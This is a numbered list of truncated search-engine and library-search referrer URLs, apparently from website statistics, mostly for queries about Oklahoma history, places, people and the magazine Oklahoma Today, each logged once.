1485http://www.google.com/search?q=mastodon+bone+in+Pioneer+and+Indian+museum+Woo...1
1486http://www.google.com/search?q=mccurtain+county+okla%2Brodeo+cowboys&hl=en&ie...1
1487http://www.google.com/search?q=map+lake+eufaula+area+oklahoma+pre+1960&source...1
1488http://www.google.com/search?q=map+of+azalea+festival+muskogee+oklahoma&hl=en...1
1489http://www.google.com/search?q=margaret+taylor+day+ballet&hl=en&start=20&sa=N...1
1490http://www.google.com/search?q=map+to+outlaw+lake+in+marlow,+oklahoma&hl=en&s...1
1491http://www.google.com/search?q=moser+oklahoma+run&hl=no&rls=GGLD,GGLD:2004-51...1
1492http://www.google.com/search?q=mley+games&hl=en&rlz=1T4RNWN_enUS252US252&star...1
1493http://www.google.com/search?q=monroe+tsatoke+ancestors&hl=en&start=10&sa=N1
1494http://www.google.com/search?q=miss++ladonna&sourceid=ie7&rls=com.microsoft:e...1
1495http://www.google.com/search?q=month-+long+water+summer+camps+in+tulsa,OK&hl=...1
1496http://www.google.com/search?q=menu-+brownies+hamburgers+-+21st+and+Harvard,+...1
1497http://www.google.com/search?q=methodist+summer+camp+oklahoma+camp+egan&hl=en...1
1498http://www.google.com/search?q=mirac+creepingbear+bio&hl=en&rls=com.microsoft...1
1499http://www.google.com/search?q=milly+francis&hl=en&start=0&sa=N1
1500http://www.google.com/search?q=petrified+wood+covered+wagon+lamp&rls=com.micr...1
1501http://www.google.com/search?q=osage+indian+tattoos&hl=en&rls=com.microsoft:e...1
1502http://www.google.com/search?q=ou+vs+osu+football+1976&hl=en&start=10&sa=N1
1503http://www.google.com/search?q=orthodox+cross+motif+as++quilt+and+patchwork+p...1
1504http://www.google.com/search?q=outdoor+paintings+1976+by++DL&hl=en&client=fir...1
1505http://www.google.com/search?q=parachute+rigger+plaques&hl=en&start=60&sa=N1
1506http://www.google.com/search?q=oklahoma+state+university+school+of+hotel+and+...1
1507http://www.google.com/search?q=oklahoma+today&ie=utf-8&oe=utf-8&aq=t&rls=org....1
1508http://aolsearch.aol.com/aol/search?encquery=d487cc12ebdd7ece5a8dd179b92dd20f...1
1509http://www.google.com/search?q=old+baldy+korean+war+west+view&hl=en&start=170...1
1510http://www.google.com/search?q=oklahoma+retreat&hl=en&safe=active&client=fire...1
1511http://aolsearch.aol.com/aol/search?encquery=cf708dadf26c911082bfe951486f9ba7...1
1512http://www.google.com/search?q=peter+shelton+hopi&hl=en&client=firefox-a&rls=...1
1513http://www.google.com/search?q=pawnee+death+danny+skeen&hl=en&safe=active&rlz...1
1514http://www.google.com/search?q=petrified+wood+at+roosevelt+wa&hl=en&rlz=1G1GG...1
1515http://www.google.com/search?q=past+broken+arrow+ok.+fire+chief+in+1979&hl=en...1
1516http://www.google.com/search?q=past+performances+at+the+myriad+convention+cen...1
1517http://www.google.com/search?q=pawnee+bill+w+paint+horse&hl=en&rls=com.micros...1
1518http://www.google.com/search?q=paul+laune+portrait&hl=en&rls=com.microsoft:en...1
1519http://www.google.com/search?q=oklahoma+all-state+basketball+1973&hl=en&start...1
1520http://aolsearch.aol.com/aol/search?encquery=d58bf18b3f3704c0f701887d05bb2136...1
1521http://www.google.com/search?q=oklahoma+diner&rls=com.microsoft:*:IE-SearchBo...1
1522http://www.google.com/search?q=oklahoma+christian+heritage+senior+class+1983+...1
1523http://www.google.com/search?q=oklahoma+diners&btnG=Search&hl=en1
1524http://www.google.com/search?q=oklahoma+football+1956&hl=en&client=firefox-a&...1
1525http://www.google.com/search?q=oklahoma+arrowheads+prose+OR+poetry&hl=en&rls=...1
1526http://www.google.com/search?q=oklahoma+bed+and+breakfast+magazine&hl=en&rls=...1
1527http://www.google.com/search?q=oklahoma+buking+bull&hl=en&rlz=1T4ADBS_enUS264...1
1528http://www.google.com/search?q=oklahoma+bowfishing+&hl=en&rls=TSHA,TSHA:2006-...1
1529http://www.google.com/search?q=oklahoma+old+rhyme+wrangler+now+you%27ve+got+i...1
1530http://www.google.com/search?q=oklahoma+meers+platinum+mine&btnG=Search&hl=en...1
1531http://www.google.com/search?q=oklahoma+milfs+4+u&ie=utf-8&oe=utf-8&aq=t&rls=...1
1532http://www.google.com/search?q=oklahoma+maypops&rls=com.microsoft:*&ie=UTF-8&...1
1533http://www.google.com/search?q=oklahoma+oilman&hl=en&rls=GGLD,GGLD:2004-06,GG...1
1534http://www.google.com/search?q=oklahoma+garden+magazine&hl=en&safe=active&sta...1
1535http://www.google.com/search?q=oklahoma+high+school+sports+express+at+northwe...1
1536http://www.google.com/search?q=oklahoma+kansas+rock+art+footprints&hl=en&pwst...1
1537http://www.google.com/search?q=oklahoma+in+1961&hl=en&client=safari&rls=en&st...1
1538http://libgooglem.library.okstate.edu/search?q=101+ranch&site=EPC&btnG=EPC+Se...1
1539http://search.alot.com/web?src_id=11078&install_time=2008-01-30T08%3A44%3A00%...1
1540http://search.aol.co.uk/aol/search?invocationType=topsearchbox.search&query=f...1
1541http://search.alot.com/web?src_id=11077&install_time=2008-02-29T12%3A11%3A00%...1
1542http://search.aol.com/aol/search?invocationType=comsearch30&query=green+swamp...1
1543http://search.aol.com/aol/search?invocationType=ieToolbar&query=Atlats+belts1
1544http://query.nytimes.com/search/query?query=spring+1968&sort=closest&n=10&src...1
1545http://rsulibeps.rsu.edu/rooms/portal/media-type/html/language/en/country/US/...1
1546http://search.alice.it/search/cgi/search.cgi?qs=ancient+creek+numerals&dom=s&...1
1547http://libgooglem.library.okstate.edu/search?access=p&output=xml_no_dtd&sort=...1
1548http://pipl.com/directory/people/Bud/Beyer1
1549http://search.aol.com/aol/search?query=Bob+Hammack&page=5&nt=SG3&encquery=122...1
1550http://libgooglem.library.okstate.edu/search?access=p&output=xml_no_dtd&sort=...1
1551http://search.aol.com/aol/search?query=%2B%22Lyle+Dye%22&page=2&nt=SG2&invoca...1
1552http://search.aol.com/aol/search?query=free+cherokee+seven+point+star+quilt+p...1
1553http://search.aol.com/aol/search?invocationType=ieToolbar&query=hominy+indian...1
1554http://search.aol.com/aol/search?invocationType=topsearchbox.search&query=lak...1
1555http://search.aol.com/aol/search?lookupType=11&sourceType=402&text=&q=&invoca...1
1556http://search.aol.com/aol/search?invocationType=topsearchbox.search&query=nud...1
1557http://libgooglem.library.okstate.edu/search?access=p&output=xml_no_dtd&sort=...1
1558http://my.att.net/s/s.dll?num=10&spage=search%2Fresultshome1.htm&channel=engl...1
1559http://libgooglem.library.okstate.edu/search?access=p&output=xml_no_dtd&sort=...1
1560http://libgooglem.library.okstate.edu/search?q=year+in+review+&site=OKToday&o...1
1561http://libgooglem.library.okstate.edu/search?access=p&output=xml_no_dtd&sort=...1
1562http://my.att.net/s/s.dll?spage=search/resultshome1.htm&searchtype=web&startd...1
1563http://libgooglem.library.okstate.edu/search?q=wiley+post&site=EPC&sort=date%...1
1564http://libgooglem.library.okstate.edu/search?q=wister+suicides&site=EPC&sort=...1
1565http://libgooglem.library.okstate.edu/search?q=wpa+buildings+in+stillwater+ok...1
1566http://libgooglem.library.okstate.edu/search?q=wo3&site=EPC&btnG=EPC+Search&s...1
1567http://oklahomatoday.com/index.aspx1
1568http://okiedoke.com/blog/index.php1
1569http://libgooglem.library.okstate.edu/search?access=p&output=xml_no_dtd&sort=...1
1570http://okiedoke.com/blog/?paged=21
1571http://libgooglem.library.okstate.edu/search?access=p&output=xml_no_dtd&sort=...1
1572http://northeastkansas.cox.net/cci/search/google?_mode=view&_state=normal1
1573http://okiedoke.com/blog/1
1574http://okiedoke.com/blog/?p=22141
1575http://okiedoke.com/blog/?m=2005121
1576http://libgooglem.library.okstate.edu/search?q=wilbourn&site=EPC&btnG=EPC+Sea...1
1577http://search.hp.netscape.com/hp/search?fromPage=HPPavTop&query=needing+parts...1
1578http://search.hp.netscape.com/hp/search?fromPage=HPPavTop&query=okla+spartan+...1
1579http://search.hp.netscape.com/hp/search?fromPage=HPPav1Top&query=FAST+AND+THE...1
1580http://libgooglem.library.okstate.edu/search?access=p&output=xml_no_dtd&sort=...1
1581http://search.hp.netscape.com/hp/search?query=Spring+Valley+Ranch+in+Eucha%2C...1
1582http://search.hp.my.aol.co.uk/aol/search?query=hlgh+++school+++musal++1&page=...1
1583http://search.hp.my.aol.com/aol/search?invocationType=enus-mh-1_-cp-ws-cn-dt&...1
1584http://search.hp.my.aol.fr/aol/search?invocationType=frfr-mh-1_-cp-ws-cn-nb&s...1
1585http://search.hp.my.aol.com/aol/search?invocationType=topsearchbox.search&que...1
1586http://search.earthlink.net/search?q=james+hinton+and+cherokee+strip+run&star...1
1587http://libgooglem.library.okstate.edu/search?access=p&output=xml_no_dtd&sort=...1
1588http://search.live.com/results.aspx?q=Gloria+farley+Pontotoc+Stone&form=QBRE1
1589http://search.live.com/results.aspx?FORM=DNSAS&q=library.okstate.edu1
1590http://search.live.com/results.aspx?q=Oaklahoma+Today&src=IE-SearchBox1
1591http://search.hp.netscape.com/hp/search?query=mercantile+store+tulsey&st=webr...1
1592http://search.icq.com/search/results.php?q=dick+west&ch_id=icq-fx-web&num=&se...1
1593http://search.isp.netscape.com/nsisp/boomframe.jsp?query=tornadoes+death+tota...1
1594http://search.icq.com/search/results.php?q=text+gonna+gi+my+own+way+high+scho...1
1595http://search.aol.com/aol/search?query=robbers+cave+cabin+with+hot+tub&invoca...1
1596http://search.comcast.net/?cat=web&con=betab&q=tri-state+precious+metals,+sal...1
1597http://search.comcast.net/?cat=web&con=net&q=Beefeater+Gin+collectibles&offse...1
1598http://search.comcast.net/?cat=web&con=betaa&q=john+F.+bailey+%2F+soil+conser...1
1599http://search.comcast.net/?q=history+of+murders+and+killings+18years+ago+in+m...1
1600http://search.comcast.net/search?cat=Web&con=toolbar&safe=on&cid=toolbar_butt...1
1601http://search.comcast.net/?cat=web&con=betaa&form_submit=1&q=big+kiamichis+fo...1
1602http://search.comcast.net/?cat=web&con=betaa&q=1968+rolling+stone+volume+no+1...1
1603http://search.comcast.net/?cat=web&con=betaa&q=buck+garrett+gunfights&offset=...1
1604http://search.comcast.net/?cat=web&con=betaa&q=buck+garrett+gunfights1
1605http://libgooglem.library.okstate.edu/search?access=p&output=xml_no_dtd&sort=...1
1606http://search.daum.net/search?t__nil_searchbox=btn&w=tot&sType=tot&q=oklihoma...1
1607http://search.earthlink.net/search?q=Camp-a-Float&area=earthlink-ws&FD=0&chan...1
1608http://search.daum.net/search?nil_suggest=btn&nil_ch=&rtupcoll=&w=tot&m=&lpp=...1
1609http://libgooglem.library.okstate.edu/search?access=p&output=xml_no_dtd&sort=...1
1610http://search.comcast.net/search?cat=web&con=toolbar&q=caves+in+Arkoma+oklaho...1
1611http://search.conduit.com/Results.aspx?q=1ndian+hot&hl=ar&SelfSearch=1&ctid=C...1
1612http://search.conduit.com/Results.aspx?q=womble+boiler+explosion&SearchSource...1
1613http://search.conduit.com/Results.aspx?q=black+gtrls+having+sex&ctid=CT156155...1
1614http://search.live.com/results.aspx?q=sheilah+bright&go=Search&form=QBRE1
1615http://libgooglem.library.okstate.edu/search?access=p&output=xml_no_dtd&sort=...1
1616http://libgooglem.library.okstate.edu/search?q=sensor+network&site=EPC&sort=d...1
1617http://libgooglem.library.okstate.edu/search?access=p&output=xml_no_dtd&sort=...1
1618http://libgooglem.library.okstate.edu/search?q=sheba&site=OKToday&sort=date%3...1
1619http://libgooglem.library.okstate.edu/search?q=sinclair+gasoline+plants+%2B+1...1
1620http://libgooglem.library.okstate.edu/search?q=sTATE+aRT+cOLLECTION&site=OKTo...1
1621http://libgooglem.library.okstate.edu/search?q=sally+kern&site=OKToday&btnG=S...1
1622http://libgooglem.library.okstate.edu/search?access=p&output=xml_no_dtd&sort=...1
1623http://libgooglem.library.okstate.edu/search?q=saltpeter&site=EPC&sort=date%3...1
1624http://libgooglem.library.okstate.edu/search?q=route+66&site=OKToday&btnG=Sea...1
1625http://libgooglem.library.okstate.edu/search?q=sowder&site=EPC&sort=date%3AD%...1
1626http://libgooglem.library.okstate.edu/search?q=spiro+mounds&site=EPC&btnG=EPC...1
1627http://libgooglem.library.okstate.edu/search?q=sooner+legends+inn&site=OKToda...1
1628http://libgooglem.library.okstate.edu/search?q=spiro+mounds&site=EPC&sort=dat...1
1629http://libgooglem.library.okstate.edu/search?q=slave+interviews&site=EPC&btnG...1
1630http://libgooglem.library.okstate.edu/search?q=smok-shak&site=EPC&sort=date%3...1
1631http://libgooglem.library.okstate.edu/search?q=sonics&site=OKToday&sort=date%...1
1632http://libgooglem.library.okstate.edu/search?q=smoke&site=OKToday&btnG=EPC+Se...1
1633http://libgooglem.library.okstate.edu/search?q=state+bird&site=OKToday&btnG=E...1
1634http://libgooglem.library.okstate.edu/search?q=quanah+parker+lake+dam+history...1
1635http://libgooglem.library.okstate.edu/search?access=p&output=xml_no_dtd&sort=...1
1636http://libgooglem.library.okstate.edu/search?q=puzzles&site=OKToday&btnG=Sear...1
1637http://libgooglem.library.okstate.edu/search?q=recurring+sequences&site=EPC&s...1
1638http://libgooglem.library.okstate.edu/search?access=p&output=xml_no_dtd&sort=...1
1639http://libgooglem.library.okstate.edu/search?q=poverty&site=EPC&output=xml_no...1
1640http://libgooglem.library.okstate.edu/search?q=pray+and+greenleaf&site=EPC&ou...1
1641http://libgooglem.library.okstate.edu/search?access=p&output=xml_no_dtd&sort=...1
1642http://libgooglem.library.okstate.edu/search?access=p&output=xml_no_dtd&sort=...1
1643http://libgooglem.library.okstate.edu/search?q=rose+state+college+basketball+...1
1644http://libgooglem.library.okstate.edu/search?q=rex+f.+harlow+building+a+publi...1
1645http://libgooglem.library.okstate.edu/search?q=rocking+curve&site=EPC&sort=da...1
1646http://libgooglem.library.okstate.edu/search?q=reptiles%2Cinsects&site=OKToda...1
1647http://libgooglem.library.okstate.edu/search?access=p&output=xml_no_dtd&sort=...1
1648http://libgooglem.library.okstate.edu/search?q=recycling+tips&site=EPC&sort=d...1
1649http://libgooglem.library.okstate.edu/search?q=red+earth+festival&site=OKToda...1
1650http://libgooglem.library.okstate.edu/search?q=reptiles%2Cinsects&site=OKToda...1
1651http://libgooglem.library.okstate.edu/search?q=redhawks&site=OKToday&btnG=Sea...1
1652http://libgooglem.library.okstate.edu/search?q=white+church&site=EPC&btnG=EPC...1
1653http://libgooglem.library.okstate.edu/search?access=p&output=xml_no_dtd&sort=...1
1654http://libgooglem.library.okstate.edu/search?q=vinita+cravens&site=OKToday&so...1
1655http://libgooglem.library.okstate.edu/search?q=veterinarian+sailboat&site=OKT...1
1656http://libgooglem.library.okstate.edu/search?q=volume+18+%231&site=EPC&btnG=E...1
1657http://libgooglem.library.okstate.edu/search?q=wake+island+bristow&site=EPC&b...1
1658http://libgooglem.library.okstate.edu/search?q=ufo&site=OKToday&sort=date%3AD...1
1659http://libgooglem.library.okstate.edu/search?access=p&output=xml_no_dtd&sort=...1
1660http://libgooglem.library.okstate.edu/search?q=vacuum+technology&site=EPC&sor...1
1661http://libgooglem.library.okstate.edu/search?q=v.e.+curtis&site=EPC&output=xm...1
1662http://libgooglem.library.okstate.edu/search?access=p&output=xml_no_dtd&sort=...1
1663http://libgooglem.library.okstate.edu/search?q=wayne+coyne&site=OKToday&sort=...1
1664http://libgooglem.library.okstate.edu/search?q=welding&site=EPC&btnG=EPC+Sear...1
1665http://libgooglem.library.okstate.edu/search?q=wayne%27s+drive+inn&site=OKTod...1
1666http://libgooglem.library.okstate.edu/search?access=p&output=xml_no_dtd&sort=...1
1667http://libgooglem.library.okstate.edu/search?q=walnut+texoma&site=EPC&sort=da...1
1668http://libgooglem.library.okstate.edu/search?access=p&output=xml_no_dtd&sort=...1
1669http://libgooglem.library.okstate.edu/search?q=waterways+on+indian+reservatio...1
1670http://libgooglem.library.okstate.edu/search?q=waste+management+recycling&sit...1
1671http://libgooglem.library.okstate.edu/search?access=p&output=xml_no_dtd&sort=...1
1672http://libgooglem.library.okstate.edu/search?access=p&output=xml_no_dtd&sort=...1
1673http://libgooglem.library.okstate.edu/search?q=town+of+buk&site=EPC&btnG=EPC+...1
1674http://libgooglem.library.okstate.edu/search?q=tahlequah+1930%27s&site=EPC&bt...1
1675http://libgooglem.library.okstate.edu/search?q=transporation+&site=EPC&btnG=E...1
1676http://libgooglem.library.okstate.edu/search?q=traveling+timber+towns&site=EP...1
1677http://libgooglem.library.okstate.edu/search?q=state+timeline&site=EPC&sort=d...1
1678http://libgooglem.library.okstate.edu/search?access=p&output=xml_no_dtd&sort=...1
1679http://libgooglem.library.okstate.edu/search?q=synagogue&site=EPC&btnG=EPC+Se...1
1680http://libgooglem.library.okstate.edu/search?q=stock+index+futures&site=EPC&b...1
1681http://libgooglem.library.okstate.edu/search?q=tulsa+riots&site=EPC&sort=date...1
1682http://libgooglem.library.okstate.edu/search?q=tulsa+grand+prix&site=EPC&btnG...1
1683http://libgooglem.library.okstate.edu/search?q=tulsa+race+riots&site=EPC&btnG...1
1684http://libgooglem.library.okstate.edu/search?q=tree+farm&site=OKToday&sort=da...1
1685http://libgooglem.library.okstate.edu/search?q=tulsa+race+roit&site=EPC&sort=...1
1686http://libgooglem.library.okstate.edu/search?access=p&output=xml_no_dtd&sort=...1
1687http://libgooglem.library.okstate.edu/search?q=treasure&site=OKToday&btnG=Sea...1
1688http://libgooglem.library.okstate.edu/search?access=p&output=xml_no_dtd&sort=...1
1689http://libgooglem.library.okstate.edu/search?access=p&output=xml_no_dtd&sort=...1
1690http://libgooglem.library.okstate.edu/search?q=postoak&site=EPC&btnG=EPC+Sear...1
1691http://www.google.ca/search?hl=fr&q=flood+oklahoma+today&btnG=Recherche+Googl...1
1692http://www.google.ca/search?hl=fr&rls=GGLG%2CGGLG%3A2005-47%2CGGLG%3Aen&q=pri...1
1693http://www.google.ca/search?hl=fr&lr=lang_en&sa=X&oi=spell&resnum=0&ct=result...1
1694http://www.google.ca/search?hl=fr&sa=X&oi=spell&resnum=0&ct=result&cd=1&q=rob...1
1695http://www.google.ca/search?hl=fr&safe=off&client=firefox-a&channel=s&rls=org...1
1696http://www.google.ca/search?hl=en&sa=X&oi=spell&resnum=0&ct=result&cd=1&q=197...1
1697http://www.google.ca/search?hl=en&sa=X&oi=spell&resnum=0&ct=result&cd=1&q=A.F...1
1698http://libgooglem.library.okstate.edu/search?access=p&output=xml_no_dtd&sort=...1
1699http://www.google.ca/search?hl=en&sa=X&oi=spell&resnum=0&ct=result&cd=1&q=clo...1
1700http://www.google.ca/search?hl=en&q=oklahoma+chickasaw+nation+turnpike+failur...1
1701http://www.google.ca/search?q=Stylized+Nuthatch+Carving&hl=en&safe=active&sta...1
1702http://www.google.ca/search?q=katherine+ross,es+photo+scenes+in+rodeo++girl&h...1
1703http://www.google.ca/search?q=Happay+Spring&hl=en&sourceid=gd&rls=GGLD,GGLD:2...1
1704http://www.google.ca/search?q=mide+evil+games&hl=en&start=90&sa=N1
1705http://www.google.ca/search?q=%22gentle+departure%22&hl=en&client=firefox-a&c...1
1706http://www.google.ca/search?q=%22sudden+beauty%22+hair+spray&hl=en&start=10&s...1
1707http://www.google.ca/search?q=Alkali+Lake+BC+Old+Braves&hl=en&start=10&sa=N1
1708http://www.google.ca/search?q=1974+Canadian+Finals+Rodeo+barrel+racers&hl=en&...1
1709http://www.google.ca/search?q=nina+morishige&hl=en&start=10&sa=N1
1710http://www.google.ae/search?hl=en&q=hindi+dibition+songs&meta=1
1711http://www.google.am/search?hl=hy&q=engine+number+lincoln+toun+car&meta=1
1712http://www.farminfo.org/othercrops/bamboo.htm1
1713http://www.google.at/search?q=0kla&ie=utf-8&oe=utf-8&aq=t&rls=org.mozilla:de:...1
1714http://www.google.az/search?hl=az&q=meeting+with+glrls+from+japan&btnG=Google...1
1715http://www.dogpile.com/dogpile/ws/results/Web/first%20package%20of%20chewing%...1
1716http://www.dogpile.com/dogpile/ws/results/Web/i%20cact%20buy%20my%20medicine%...1
1717http://libgooglem.library.okstate.edu/search?access=p&output=xml_no_dtd&sort=...1
1718http://libgooglem.library.okstate.edu/search?access=p&output=xml_no_dtd&sort=...1
1719http://www.google.ca/search?hl=en&q=effects+of+alcohol+artshow&btnG=Search&me...1
1720http://www.google.ca/search?client=firefox-a&rls=org.mozilla%3Aen-US%3Aoffici...1
1721http://www.google.ca/search?hl=en&q=1960s+fords+or+mercurys+with+the+wined+do...1
1722http://www.google.ca/search?client=firefox-a&rls=org.mozilla%3Aen-US%3Aoffici...1
1723http://www.google.ca/search?hl=en&q=HEF+26+WD+Electric+Fireplace&btnG=Search&...1
1724http://www.google.be/search?q=ard+top+pour+cheyenne+ocassion+1985&hl=fr&rlz=1...1
1725http://www.google.bg/search?hl=bg&client=firefox-a&channel=s&rls=org.mozilla:...1
1726http://www.google.ca/hws/search?q=%22wild+west+shows%22%2Bcanada%2B1910&clien...1
1727http://www.google.bg/search?q=ihe+season+spring&hl=bg&start=90&sa=N1
1728http://www.dogpile.com/dogpile/ws/results/Web/catfish%20restaurant%20around%2...1
1729http://www.google.co.in/search?q=1980+fashion+indiandesigners&hl=en1
1730http://www.google.co.in/search?q=open+flee+markets+with+junk+&hl=en&client=fi...1
1731http://www.google.co.in/search?hl=en&sa=X&oi=spell&resnum=0&ct=result&cd=1&q=...1
1732http://www.google.co.jp/search?sourceid=navclient&hl=ja&ie=UTF-8&rlz=1T4GGLJ_...1
1733http://www.google.co.ma/search?q=carte+de+hammate+de+rich&hl=fr&start=10&sa=N...1
1734http://www.google.co.in/search?hl=en&q=grucht+horror+movie&btnG=Search&meta=1
1735http://libgooglem.library.okstate.edu/search?access=p&output=xml_no_dtd&sort=...1
1736http://www.google.co.in/search?hl=en&q=photoraphy+tricks+light&meta=1
1737http://www.google.co.in/search?hl=en&q=photography+%2Bcombination+%2Blist+%2B...1
1738http://www.google.co.in/search?hl=en&q=Hindu+Festival+Dates+1974-1975&meta=1
1739http://www.google.co.uk/custom?hl=en&client=pub-9091551696182533&channel=0398...1
1740http://www.google.co.uk/hws/search?client=dell-usuk&adsafe=high&safe=high&cha...1
1741http://www.google.co.th/search?q=Pdic+Girl&hl=th&start=90&sa=N1
1742http://www.google.co.uk/search?client=firefox-a&rls=org.mozilla%3Aen-GB%3Aoff...1
1743http://www.google.co.th/1
1744http://libgooglem.library.okstate.edu/search?access=p&output=xml_no_dtd&sort=...1
1745http://www.google.co.th/search?hl=th&sa=X&oi=spell&resnum=0&ct=result&cd=1&q=...1
1746http://www.google.co.th/search?hl=th&q=George+w+Bu%26h+born&meta=1
1747http://www.google.ca/search?q=quetzalcoatl+temple+burial+guardians+pdf&hl=en&...1
1748http://www.google.cl/search?q=martin+pauls&hl=es&start=30&sa=N1
1749http://www.google.cl/search?q=que+invento+bbor&hl=es&start=10&sa=N1
1750http://www.google.ch/search?hl=de&q=Martin+Wiesendanger%2C+Oklahoma&btnG=Goog...1
1751http://www.google.cn/search?complete=1&hl=zh-CN&newwindow=1&q=BIG+BEAR+AQOA&m...1
1752http://libgooglem.library.okstate.edu/search?access=p&output=xml_no_dtd&sort=...1
1753http://www.google.ca/search?q=violin+varnish+recipe++filetype:pdf&hl=en&safe=...1
1754http://www.google.ca/search?sourceid=navclient&ie=UTF-8&rls=HPID,HPID:2005-18...1
1755http://www.google.ch/search?hl=de&q=Margaret+und+Martin+Wiesendanger%2C+Tulsa...1
1756http://libgooglem.library.okstate.edu/search?access=p&output=xml_no_dtd&sort=...1
1757http://www.google.co.in/search?hl=en&q=1980+fashion+indiandesigners&meta=1
1758http://www.google.co.id/search?hl=id&q=AUTUMN%2C+1975&meta=1
1759http://www.google.co.id/search?q=%22pdf%22++photography+trick&hl=id&start=80&...1
1760http://libgooglem.library.okstate.edu/search?access=p&output=xml_no_dtd&sort=...1
1761http://www.google.co.in/search?complete=1&hl=hi&q=indian+militory+academy&met...1
1762http://www.google.cn/search?q=mav-11&complete=1&hl=zh-CN&newwindow=1&start=24...1
1763http://www.google.cn/search?q=p43ab&complete=1&hl=zh-CN&newwindow=1&rls=com.m...1
1764http://www.google.co.cr/search?source=ig&hl=es&rlz=&q=Dialy+newa+paper+in+Ard...1
1765http://www.google.co.cr/search?hl=es&q=etmed+american+heart+association&meta=...1
1766http://search.live.com/results.aspx?q=spirit+of+spring+crumbo&go=&form=QBRE1
1767http://search.yahoo.com/search;_ylt=A0oGkk3H2.JH5oABbPJXNyoA?p=oklahoma+today...1
1768http://search.yahoo.com/search;_ylt=A0oGkl.OPOhHeIgAlk1XNyoA?p=blackbear+bosi...1
1769http://search.yahoo.com/search;_ylt=A0geu78sEtZHfggARIBXNyoA?p=Oklahoma+magaz...1
1770http://search.yahoo.com/search?ei=UTF-8&fr=moz2&p=oklahoma+magazine1
1771http://search.yahoo.com/search?ei=UTF-8&fr=yfp-t-113&p=pedal+pushers+flowers%...1
1772http://search.virginmedia.com/results/?channel=homepage&vml=virgin&vmt=t1&q=r...1
1773http://search.windstream.net/_1_24ETTUS02EJCGWF__wind.main/search/web/Clarmor...1
1774http://search.yahoo.com/search;_ylt=A0geu70rDMtH50QAmHZXNyoA?p=ralph+wall+art...1
1775http://search.yahoo.com/search;_ylt=A0geu.lGut5HuVgBpGFXNyoA?p=oklahoma+state...1
1776http://search.sweetim.com/search.asp?q=MCALESTER++TENNIS+TOURNAMENT&ln=en&sta...1
1777http://search.yahoo.com/search?p=digital.library.okstate.edu%2Foktoday%2F2000...1
1778http://search.yahoo.com/search?p=jacques+hans+Gallrein&ei=UTF-8&y=Search&fr=y...1
1779http://search.yahoo.com/search?p=digital.library.okstate.edu%2Foktoday%2F2000...1
1780http://search.yahoo.com/search?p=oklahoma+today+fall+1958&fr=yfp-t-501&toggle...1
1781http://search.yahoo.com/search?p=%22National+Quail+Hunt%22&n=10&ei=UTF-8&va_v...1
1782http://search.yahoo.com/search?p=Fred+Olds+oklahoma&ei=UTF-8&y=Search&fr=yfp-...1
1783http://search.yahoo.com/search?p=Walter+M.+Harrison%2C+Oklahoma&fr=yfp-t-501&...1
1784http://search.yahoo.com/search?p=Ken+Greenwood+oklahoma+photo&fr=yfp-t-501&to...1
1785http://libgooglem.library.okstate.edu/search?access=p&output=xml_no_dtd&sort=...1
1786http://search.msn.com/results.aspx?q=Oklahoma+Today&FORM=MSNH1
1787http://search.msn.com/results.aspx?q=Oklahoma+Today+Magazine&FORM=MSNH1
1788http://search.msn.com/results.aspx?q=Bob+Hammack+oklahoma+city&first=11&FORM=...1
1789http://search.msn.com/results.aspx?q=oklahoma+today&FORM=MSNH1
1790http://search.msn.com/results.aspx?q=william+creepingbear&first=21&FORM=PERE2...1
1791http://search.live.com/results.aspx?q=treasure+hunting+in+washita+county+corn...1
1792http://search.live.com/results.aspx?srch=106&FORM=AS6&q=Oklahoma+Today1
1793http://search.msn.com/results.asp?FORM=sCPN&RS=CHECKED&un=doc&v=1&q=oklahoma%...1
1794http://search.msn.com/results.asp?FORM=sCPN&RS=CHECKED&un=doc&v=1&q=%22Jean%2...1
1795http://libgooglem.library.okstate.edu/search?access=p&output=xml_no_dtd&sort=...1
1796http://search.netscape.com/search/search?invocationType=topsearchbox.search&q...1
1797http://search.netscape.com/search/search?query=arrowhead+pay+dig+sites+in+okl...1
1798http://search.myway.com/search/GGweb.jhtml?pg=GGmain&action=click&searchfor=w...1
1799http://search.netscape.com/search/search?query=award+for+stamp+collection+woo...1
1800http://search.myway.com/search/GGmain.jhtml?ptnrS=de&type=w&st=site&searchfor...1
1801http://search.myway.com/search/GGmain.jhtml?st=bar&searchfor=michael+wallis+e...1
1802http://search.myway.com/search/GGmain.jhtml?st=site&ptnrS=de&ss=sub&searchfor...1
1803http://search.myway.com/search/GGmain.jhtml?st=site&ptnrS=de&ss=sub&searchfor...1
1804http://www.dogpile.com/dogpile/ws/results/Web/Photo%20of%20Oklahoma%20City's%...1
1805http://www.altavista.com/web/results?itag=ody&q=Sophian+Retreat+Oklahoma&kgs=...1
1806http://www.americandinermuseum.org/1
1807http://libgooglem.library.okstate.edu/search?access=p&output=xml_no_dtd&sort=...1
1808http://www.answers.com/why%20did%20the%20XIT%20Ranch%20cease%20operation%3F1
1809http://www.ascx.com/gymco.htm1
1810http://webferret.search.com/search?q=osage+prayers&source=1139&frame=1&link_t...1
1811http://websearch.cs.com/wm/boomframe.jsp?query=seminole+patchwork+skirt&page=...1
1812http://www.adelphia.net/google/index.php?q=wirt+oklahoma1
1813http://libgooglem.library.okstate.edu/search?access=p&output=xml_no_dtd&sort=...1
1814http://webferret.search.com/search?q=Osage+prayers&source=1139&frame=1&link_t...1
1815http://www.charter.net/google/index.php?q=fountainhead-eufaula%2C+ok&context=...1
1816http://www.charter.net/google/index.php?start=10&q=koshare%20clown%20fishing1
1817http://www.bocn.co.uk/component/option,com_fireboard/Itemid,26/func,view/cati...1
1818http://www.dogpile.com/dogpile/ws/results/Web/'Riverbank%20Power'/2/0/0/Relev...1
1819http://www.ask.com/web?q=oklahoma+state+cowboy+wrestling+charles+light&qsrc=0...1
1820http://www.ask.com/web?qsrc=167&o=0&l=dir&q=Dean+Davis+Wrestler+Oklahoma+Stat...1
1821http://libgooglem.library.okstate.edu/search?access=p&output=xml_no_dtd&sort=...1
1822http://www.blingo.com/search?q=are+there+any+oil+derricks+in+oklahoma+that+be...1
1823http://search.yahoo.com/search?p=tom+luker+oklahoma&ei=utf-8&fr=slv8-&xargs=0...1
1824http://search11.info.com/paul%20heltzen?CMP=3509&itkw=paul%20heltzen&affiliat...1
1825http://southeastkansas.cox.net/cci/search/google?_mode=view&_state=normal1
1826http://search1.seznam.cz/google?q=spencer%2Basah%2Bphoto%2Bkiowa&count=10&fro...1
1827http://startgoogle.startpagina.nl/?start=0&q=winter+1978/19791
1828http://startgoogle.startpagina.nl/?start=100&q=haviland%20beaver&lr=&related=...1
